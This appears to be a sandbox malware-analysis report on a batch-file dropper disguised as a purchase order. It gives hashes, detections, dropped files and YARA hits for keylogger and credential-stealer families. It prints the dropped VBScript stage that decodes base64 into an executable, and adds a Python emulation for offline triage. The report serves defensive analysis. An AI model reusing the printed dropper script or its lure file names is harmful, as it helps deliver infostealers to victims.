SSDEEP: 3072:qjyOm0e6/bIhbuwxlEb1MpG+xUEyAn0fYuDGOpPXFZ7on+gUxloDMq:qjyl6ebX45OG+xUEWfYUGOpPXFZ7on+G
MD5: 22331ABCC9472CC9DC6F37FAF333AA2C
SHA1: 2A001C30BA79A19CEAF6A09C3567C70311760AA4
SHA-256: BDFA725EC2A2C8EA5861D9B4C2F608E631A183FCA7916C1E07A28B656CC8EC0C
SHA-512: C7F5BAAD732424B975A426867D3D8B5424AA830AA172ED0FF0EF630070BF2B4213750E123A36D8C5A741E22D3999CA1D7E77C62D4B77D6295B20A38114B7843C
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 3%
Joe Sandbox View:
• Filename: ENQ-0092025.doc, Detection: malicious
• Filename: yxU3AgeVTi.exe, Detection: malicious
• Filename: ITT # KRPBV2663 .doc, Detection: malicious
• Filename: PI ITS15235.doc, Detection: malicious
• Filename: PO#5_Tower_049.bat, Detection: malicious
• Filename: HSBC_PAY.SCR.exe, Detection: malicious
• Filename: PO_B2W984.com, Detection: malicious
• Filename: image.exe, Detection: malicious
• Filename: PO_KB#67897.cmd, Detection: malicious
• Filename: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, Detection: malicious
Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L....>.{..................................... ....@.......................... .......c........... ..............................................................H....................................................................................text............................... ..`.data........ ...P..................@....tls.................`..............@....rdata...............b..............@..P.idata... ...........d..............@..@.edata...............|..8...,...@...@..@

Process: C:\Users\user\AppData\Local\Temp\x.exe
File Type: MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Oupzhkpr.PIF">), ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 104
Entropy (8bit): 5.187937555197363
Encrypted: false
SSDEEP: 3:HRAbABGQYmTWAX+rSF55i0XM1N6XL3vsbxXPJovn:HRYFVmTWDyzKNafExXPmv
MD5: 73403ACC8CC138141FA79EAA29530668
SHA1: B164AEFD4AFBEBD9A960949033EF213E034F4A5C
SHA-256: AB7593E2C5D2D8EAC1B7418BCB695FC681B0B1DD1C4BF615B404BAADEE5D715F
SHA-512: 726F64F72074C2D50091D8DB28BB0941AFCE4E7750840291DC49312D82BA57B3D0D1DD58F19E9B7564433A314EE9A2315A1D82203D39FB63F78DDC4DE36BE7D1
Malicious: true
Preview: [InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Oupzhkpr.PIF"..IconIndex=961278..HotKey=22..

Process: C:\Users\user\AppData\Local\Temp\x.exe
File Type: DOS batch file, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category: dropped
Size (bytes): 15789
Entropy (8bit): 4.658965888116939
Encrypted: false
SSDEEP: 384:wleG1594aKczJRP1dADCDswtJPZ9KZVst1U:LA4aLz08JaJ
MD5: CCE3C4AEE8C122DD8C44E64BD7884D83
SHA1: C555C812A9145E2CBC66C7C64BA754B0C7528D6D
SHA-256: 4A12ABB62DD0E5E1391FD51B7448EF4B9DA3B3DC83FF02FB111E15D6A093B5E8
SHA-512: EA23EDFB8E3CDA49B78623F6CD8D0294A4F4B9B11570E8478864EBDEE39FCC6B8175B52EB947ED904BE27B5AF2535B9CA08595814557AE569020861A133D827D
Malicious: false
Preview: .@echo off..@% %e%.%c%o..%h%. .......%o%r.r.r.....% %.......%o%..%f% .%f%o%..s%...... .%e%.r.%t%...o..r.% %.....%"%.......%u%.%T%r..%A%..%j%r........%=%.. o......%s%....o...%e%.....%t%.% %........%"%.r.......o%..%uTAj%"%.. . ..%N%.r r.... %U%... .oo...%M%r.........%j%.....%=%.....o....%=%.%"%r...... %..%uTAj%"% .....%m%..oo%X%.o.. %m%.....or.%w%....%O%.%g%.....%B%.o .r.. %W%..%D%........%t%o.r...%%NUMj%h% ...o.%t%..%t%o......o%p%.........%"% .r%..%uTAj%"% .... ..%G%...o.. ..%n%..rr..%j%..o......%D%...o .r..%R%r.

Process: C:\Users\Public\Libraries\rpkhzpuO.pif
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 520
Entropy (8bit): 5.355496254154943
Encrypted: false
SSDEEP: 12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:MLUE4K5E4KlKDE4KhKiKhk
MD5: 3C255C75EA6EB42410894C0D08A4E324
SHA1: 34B3512313867B269C545241CD502B960213293A
SHA-256: 116B1D2FF17BE7FE8C4B6D935688F81C40716AFCD995C76BFC2D1AB2AFA774A7
SHA-512: 41406D84C3FC3D5EFAD22277382D9ADC444D00FDE95C1B7B6BC17E80452CA5DE084D28D892BC0C6890FE64DC733790E26D0F62FE3477175DCCCAC777FDE5E7EC
Malicious: false
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 2232
Entropy (8bit): 5.379184608538005
Encrypted: false
SSDEEP: 48:bWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//MPUyus:bLHyIFKL3IZ2KRH9Ougss
MD5: ED589B424203CBD421A2E43D1BFA6DFC
SHA1: 7C707DDD0B05B396964BB70CAFED31F6E54660B3
SHA-256: FAE87DB2990B36ABC27C2BAF4BC869F8B73EFDE806ADD150E705EF5C5D3A6E2C
SHA-512: A334C5E28FB4A46F5C0A25A00EC3CDCBD7329B1456A9544445B774E1AF9220D150E76D1BDADCFA8679EB1F487E1F499A93797651124CD3C03CB2E1C257A8AC81
Malicious: false
Preview: @...e.................................&..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

Process: C:\Users\Public\Libraries\rpkhzpuO.pif
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 98816
Entropy (8bit): 5.666546286050177
Encrypted: false
SSDEEP: 1536:qwa4JaIFveZKGAmwJVeDhp0dqnjErVf4UMR7pspNYZd:24Jj4ZKGHwJVeDDKqnj6bMDspNC
MD5: F6B8018A27BCDBAA35778849B586D31B
SHA1: 81BDE9535B07E103F89F6AEABDB873D7E35816C2
SHA-256: DDC6B2BD4382D1AE45BEE8F3C4BB19BD20933A55BDF5C2E76C8D6C46BC1516CE
SHA-512: AA958D22952D27BAD1C0D3C9D08DDBF364274363D5359791B7B06A5D5D91A21F57E9C9E1079F3F95D7CE5828DCD3E79914FF2BD836F347B5734151D668D935DE
Malicious: true
Yara Hits:
• Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Joe Security
                                                                                                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: unknown
                                                                                                                                  • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Florian Roth
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 91%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....nH...............P..x............... ........@.. ....................................`.....................................S.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc..............................@..B........................H...................Z....................................................}.....is.......................~...F...@...7...%...m...$...~...~...d...r...a...G...o...n...~.....(....*&..( ....*.s!........s"........s#........s$........s%........*Z........o8...........*&..(9....*&........*".......*Vs....(B...t.........*..(C...*"~....+.*"~....+.*"~....+.*"~....+.*"~....+.*b.r...p.oa...(....(@....*:.~.....o....&*.*:.(P....(Q....*..~3...,.~3...+.~1.....x...s....%.3...(.....*..(Y....(L...
                                                                                                                                  Process:C:\Users\Public\Libraries\rpkhzpuO.pif
                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):70656
                                                                                                                                  Entropy (8bit):4.910353963160109
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:1536:ZPqWETbZazuYx3cOBB03Cmp3gGLWUTbUwjKX4C2b+d:ZizbZazunOKrp3gGhTbUwjI4C2Sd
                                                                                                                                  MD5:E91A1DB64F5262A633465A0AAFF7A0B0
                                                                                                                                  SHA1:396E954077D21E94B7C20F7AFA22A76C0ED522D0
                                                                                                                                  SHA-256:F19763B48B2D2CC92E61127DD0B29760A1C630F03AD7F5055FD1ED9C7D439428
                                                                                                                                  SHA-512:227D7DAD569D77EF84326E905B7726C722CEFF331246DE4F5CF84428B9721F8B2732A31401DF6A8CEF7513BCD693417D74CDD65D54E43C710D44D1726F14B0C5
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 79%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.............n)... ...@....@.. ....................................`..................................)..W....@.......................`....................................................... ............... ..H............text...t.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................P)......H........>...............=..p...........................................".(!....*..s3...z..*.s.........*.(.....*Z~ ...oK...~....(!....*.(5....*&.(!.....*".......*".(u....*Vs....(v...t.........*&..(.....*Br...p(.....(...*.sL....)...*.*...0...........r...p....s........ ................. ........8[...........o.........................% ....X....o....a.o.............o....]......... ....X............o....?....(........o....o ...............8........*....0..........r)..p(....("....
                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):60
                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):60
                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):60
                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):60
                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                  Process:C:\Windows\System32\cmd.exe
                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):36864
                                                                                                                                  Entropy (8bit):5.572584352781534
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:384:ND+pvzeK1scVxBDyFPl6v63jZyTgmpHgTvJk2vLQzjqSlfok92KpvFCI5l4YXFdK:V+ld1scVxwz3jkpKkScHqkf3iIcmFqt
                                                                                                                                  MD5:77F96223CF3BA1FA0F812F9BC247E052
                                                                                                                                  SHA1:21B9F79964C76FFCF08AD4D49FAC190B78D272DC
                                                                                                                                  SHA-256:8F236C326D3C623697657A34CA9E98315B77A59EEEF1525CAB018E213100E8F4
                                                                                                                                  SHA-512:0153A63AFC1538D139628EDDB5F4428BAFEB4EE186F49E8078C651DE001C7471641B3DE0CACF5B07A76B28F6718A33C87A0735D8221FF9A6AFECBCD9154CFAC1
                                                                                                                                  Malicious:true
                                                                                                                                  Preview:TVpQAAIAAAAEAA8A//8AALgAAAAAAAAAQAAaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..AAAAAAAAAAAAEAALoQAA4ftAnNIbgBTM0hkJBUaGlzIHByb2dyYW0gbXVzdCBiZSBydW4g..dW5kZXIgV2luMzINCiQ3AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFBFAABMAQ..kAGV5CKgAAAAAAAAAA4ACOgQsBAhkAiAUAAI4OAAAAAABslwUAABAAAACgBQAAAEAAABAA..AAACAAAEAAAAAAAAAAQAAAAAAAAAALAUAAAEAAAAAAAAAgAAAAAAEAAAQAAAAAAQAAAQAA..AAAAAAEAAAAAAAAAAAAAAAAAAGADIlAAAAwAYAAOgNAAAAAAAAAAAAAAAAAAAAAAAAUAYA..pGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABABgAYAAAAAAAAAAAAAAAAAAAAAAAAAO..QGBgDMBQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALnRleHQAAAC4fwUAABAAAACABQAA..BAAAAAAAAAAAAAAAAAAAIAAAYC5pdGV4dAAAtAcAAACQBQAACAAAAIQFAAAAAAAAAAAAAA..AAACAAAGAuZGF0YQAAANQbAAAAoAUAABwAAACMBQAAAAAAAAAAAAAAAABAAADALmJzcwAA..AADENgAAAMAFAAAAAAAAqAUAAAAAAAAAAAAAAAAAAAAAwC5pZGF0YQAAMiUAAAAABgAAJg..AAAKgFAAAAAAAAAAAAAAAAAEAAAMAudGxzAAAAADQAAAAAMAYAAAAAAADOBQAAAA
                                                                                                                                  Process:C:\Windows\System32\cscript.exe
                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):1317376
                                                                                                                                  Entropy (8bit):6.092693903786427
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:24576:hULl20LaVZ0emwYGqo1FJ89BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBx:hU1X1orJEBBBBBBBBBBBBBBBBBBBBBBB
                                                                                                                                  MD5:E337ECD5680D121D6DD649956DC716CA
                                                                                                                                  SHA1:198EAA7905760AA3FEE7D7329EC6354096C6BA63
                                                                                                                                  SHA-256:80AF0DDC803BB3CD14029CD9CEE39D81B15B21FC126912EFBDD7824BA740669B
                                                                                                                                  SHA-512:75783A2850F451E4733F7CFBBF1A9451041C040BB64B7DF7AA19ABE2FFFDDF45291C4706C5F606EE6AD168779B25C0D88DE2481FC563DAB1531BFD907CC20C92
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 47%
                                                                                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................l.............@..............................................@..............................2%...........................P...a...........................@.......................................................text............................... ..`.itext.............................. ..`.data...............................@....bss.....6...............................idata..2%.......&..................@....tls....4....0...........................rdata.......@......................@..@.reloc...a...P...b..................@..B.rsrc................2..............@..@....................................@..@................................................................................................
                                                                                                                                  Process:C:\Windows\System32\cmd.exe
                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                  Category:modified
                                                                                                                                  Size (bytes):380
                                                                                                                                  Entropy (8bit):5.126074554208653
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:6:jpz7yVHPxORKm6JgCPmu7jjs9lVHEr6Jxlw6mvHFAF1GjyH4BZIkv:NZOmG7jU2r6JAiTrYZnv
                                                                                                                                  MD5:EC9A2FB69A379D913A4E0A953CD3B97C
                                                                                                                                  SHA1:A0303ED9F787C042071A1286BBA43A5BBDD0679E
                                                                                                                                  SHA-256:CF8268D158BB819EF158FF6CCBED64D5E379148A0ADB1F73A082A01D56D0286B
                                                                                                                                  SHA-512:FEF8E24A680991046BD7DACD6079C7E48C3031FE46CAAE722EA93797EE16C052073BA97959E992EA71AC7AB72FBCEDAA5CF4A410657AAC4C10AD24DE6935E9D6
                                                                                                                                  Malicious:true
                                                                                                                                  Preview:Set f=CreateObject("Scripting.FileSystemObject")'v..Set p=f.GetSpecialFolder(2)'v..Set i=f.OpenTextFile(p+"\x",1)'v..c=i.ReadAll()'v..i.Close'v..Set x=CreateObject("Msxml2.DOMDocument")'v..Set o=x.CreateElement("base64")'v..o.dataType="bin.base64"'v..o.text=c'v..Set b=CreateObject("ADODB.Stream")'v..b.Type=1'v..b.Open'v..b.Write o.NodeTypedValue'v..b.SaveToFile p+"\x.exe",2'v..
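The two records above belong together: cmd.exe writes a base64 text file (its preview begins with TVpQ, which decodes to the bytes MZP, the DOS header of a Delphi-linked executable) and the 380-byte VBS shown in this preview, and cscript.exe then runs the VBS. The script resolves GetSpecialFolder(2) (the user's temp folder), reads the base64 text from "\x", decodes it through an MSXML element with dataType bin.base64, and writes the bytes to "\x.exe" with ADODB.Stream (Type=1 is binary, SaveToFile mode 2 overwrites). The "'v" trailing every statement is a VBScript comment, so it is inert and only defeats naive string matching. The 1317376-byte PE dropped by cscript.exe, whose preview starts with "MZP" and "This program must be run under Win32", is consistent with that output. The following Python is an added example for offline triage, not code from the report or from the sample: it re-implements the decode stage so the second stage can be recovered from the two dropped files without running cscript, parses the VBS for its input and output names, and checks the decoded header. The VBS text is copied from the preview; the base64 payload it decodes is a constructed stand-in built in the block, and the preview prefix is only used to confirm that it decodes to MZP.

```python
"""Offline emulation of the dropped VBS decode stage (added example, not from the report)."""
import base64
import hashlib
import re
import textwrap

# The VBS exactly as shown in the report's preview (CRLF rendered as line breaks).
# Every statement carries a trailing 'v, which VBScript treats as a comment.
DROPPED_VBS = r'''Set f=CreateObject("Scripting.FileSystemObject")'v
Set p=f.GetSpecialFolder(2)'v
Set i=f.OpenTextFile(p+"\x",1)'v
c=i.ReadAll()'v
i.Close'v
Set x=CreateObject("Msxml2.DOMDocument")'v
Set o=x.CreateElement("base64")'v
o.dataType="bin.base64"'v
o.text=c'v
Set b=CreateObject("ADODB.Stream")'v
b.Type=1'v
b.Open'v
b.Write o.NodeTypedValue'v
b.SaveToFile p+"\x.exe",2'v
'''

# First characters of the base64 text file dropped by cmd.exe, copied from the report preview.
PAGE_PREVIEW_PREFIX = "TVpQAAIAAAAEAA8A//8AALgAAAAA"

_OPEN_RE = re.compile(r'OpenTextFile\(\s*p\s*\+\s*"([^"]+)"')
_SAVE_RE = re.compile(r'SaveToFile\s+p\s*\+\s*"([^"]+)"')


def strip_vbs_comments(script: str) -> list[str]:
    """Drop trailing ' comments (outside double-quoted strings) and blank lines."""
    statements = []
    for raw in script.splitlines():
        in_string, cut = False, len(raw)
        for idx, ch in enumerate(raw):
            if ch == '"':
                in_string = not in_string
            elif ch == "'" and not in_string:
                cut = idx
                break
        stmt = raw[:cut].strip()
        if stmt:
            statements.append(stmt)
    return statements


def extract_io_paths(script: str) -> tuple[str, str]:
    """Return (input, output) names relative to GetSpecialFolder(2), the temp folder."""
    src = "\n".join(strip_vbs_comments(script))
    m_in, m_out = _OPEN_RE.search(src), _SAVE_RE.search(src)
    if not (m_in and m_out):
        raise ValueError("OpenTextFile/SaveToFile decoder pattern not found")
    return m_in.group(1), m_out.group(1)


def decode_stage(text: str) -> bytes:
    """Mimic MSXML bin.base64: line breaks and other non-alphabet characters are ignored."""
    return base64.b64decode(re.sub(r"[^A-Za-z0-9+/=]", "", text))


def describe_pe(data: bytes) -> dict:
    """Header checks a triage script would log: MZ/MZP magic, e_lfanew, PE signature, hash."""
    info = {"size": len(data), "sha256": hashlib.sha256(data).hexdigest(),
            "delphi_stub": data[:3] == b"MZP", "e_lfanew": None, "pe_signature_ok": False}
    if len(data) >= 0x40 and data[:2] == b"MZ":
        e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
        info["e_lfanew"] = e_lfanew
        info["pe_signature_ok"] = data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"
    return info


def emulate_decoder(script: str, temp_folder: dict[str, str]) -> tuple[str, bytes]:
    """Run the decode stage without cscript: `temp_folder` maps file names to text content."""
    src, dst = extract_io_paths(script)
    if src not in temp_folder:
        raise FileNotFoundError(src)
    return dst, decode_stage(temp_folder[src])


def build_constructed_stage() -> bytes:
    """Constructed stand-in for the decoded payload (not the real 1317376-byte file):
    a Delphi-style DOS header (MZP, e_lfanew -> 0x40), a PE signature and padding."""
    dos = bytearray(0x40)
    dos[0:0x14] = b"MZP\x00\x02\x00\x00\x00\x04\x00\x0f\x00\xff\xff\x00\x00\xb8\x00\x00\x00"
    dos[0x3C:0x40] = (0x40).to_bytes(4, "little")
    stub = b"This program must be run under Win32\r\n$7"
    return bytes(dos) + b"PE\x00\x00" + stub + b"\x00" * 200


# Constructed base64 text file, wrapped with CRLF the way the dropped "\x" file is.
SAMPLE_B64 = "\r\n".join(textwrap.wrap(base64.b64encode(build_constructed_stage()).decode(), 70)) + "\r\n"

if __name__ == "__main__":
    out_name, payload = emulate_decoder(DROPPED_VBS, {"\\x": SAMPLE_B64})
    print(out_name, describe_pe(payload))
```

To apply this to the real artifacts, pass the contents of the dropped "\x" text file in place of SAMPLE_B64; the decoded bytes can then be hashed and compared with the SHA-256 of the PE that cscript.exe dropped. The comment stripper respects double-quoted strings so an apostrophe inside a path argument does not truncate a statement, and decode_stage discards non-alphabet characters because MSXML tolerates wrapped and CRLF-separated base64, which is what the batch loader emits.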
                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):665670656
                                                                                                                                  Entropy (8bit):7.999999262382833
                                                                                                                                  Encrypted:true
                                                                                                                                  SSDEEP:
                                                                                                                                  MD5:10751439BD30D4B3066935F2DFFDC3C7
                                                                                                                                  SHA1:1D49BF5717E3330A21F054A5C151A877F0B602E1
                                                                                                                                  SHA-256:5BC477921A5678551A378E244C6B0544D0DDAA27FCDCA0E3CFCD54B53FCF4BA8
                                                                                                                                  SHA-512:B945B4E58FA48745EA8AB089F32FAFE98F966F0602FD0BC519B138D8C00F8D2606FCED0A3CBDCFDD5D2B2BA59B457697DD320972D4E8EA7376B2C2B53371F415
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.............n)... ...@....@.. ....................................`..................................)..W....@.......................`....................................................... ............... ..H............text...t.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................P)......H........>...............=..p...........................................".(!....*..s3...z..*.s.........*.(.....*Z~ ...oK...~....(!....*.(5....*&.(!.....*".......*".(u....*Vs....(v...t.........*&..(.....*Br...p(.....(...*.sL....)...*.*...0...........r...p....s........ ................. ........8[...........o.........................% ....X....o....a.o.............o....]......... ....X............o....?....(........o....o ...............8........*....0..........r)..p(....("....
                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Icon number=0, Archive, ctime=Thu Jan 9 17:09:56 2025, mtime=Thu Jan 9 17:09:56 2025, atime=Thu Jan 9 17:09:56 2025, length=70656, window=
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):1784
                                                                                                                                  Entropy (8bit):3.519031277377029
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:24:8uvbqDklXUPX3PyqfAateVoFG9xR+O4ZvPqRzBm:8EbqDkl4X36efuR+ZXqRl
                                                                                                                                  MD5:27D7693300B294B6EF86370C3773184D
                                                                                                                                  SHA1:F21EC7099EE9804807FB0C8DAD1B2F0EC7E37DDB
                                                                                                                                  SHA-256:E85103EAA8EA660957B913ECE26991EB93145DB69BF0C08FDBA69E8971A61445
                                                                                                                                  SHA-512:AF297E6609FD0D25F88E3C7E328E662A9E86CCC48E09CBF6F9A09A46FACED3A1D3EF5C2CBC94981F95AAE58F90DCB45D16227893F297B080F09532E61104E1C2
                                                                                                                                  Malicious:false
                                                                                                                                  File type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                  Entropy (8bit):5.603636433588063
                                                                                                                                  TrID:
                                                                                                                                    File name:PO#3_RKG367.bat
                                                                                                                                    File size:2'158'506 bytes
                                                                                                                                    MD5:deaa9cb6ee189b95d1ad718df32dac56
                                                                                                                                    SHA1:ba94e1e97609cfa1bd102fe1087fc714875c6c25
                                                                                                                                    SHA256:8f721d0dc987c60cb16a14ad166eab606b1b9401d6563241eb8ed359c24ad201
                                                                                                                                    SHA512:02908f9c7ce3a1d53af14de4465744585b23d31e99e08d2a64030f60eac5da5505c93e5fe4de91aeb77b85377d57b047ed8a5d5262fd08dcffa30943b0bb88e1
                                                                                                                                    SSDEEP:49152:dCPDyxXvtkfpoX/xXGkA++z8+j+Dl+T++evHN+C2+1r+E++eaU++p+++7C+z+++q:n
                                                                                                                                    TLSH:E4A5F9377082095A9A0F49990E2878B53C36BFE3486459B7FD3E2F7A12C5BD1392C179
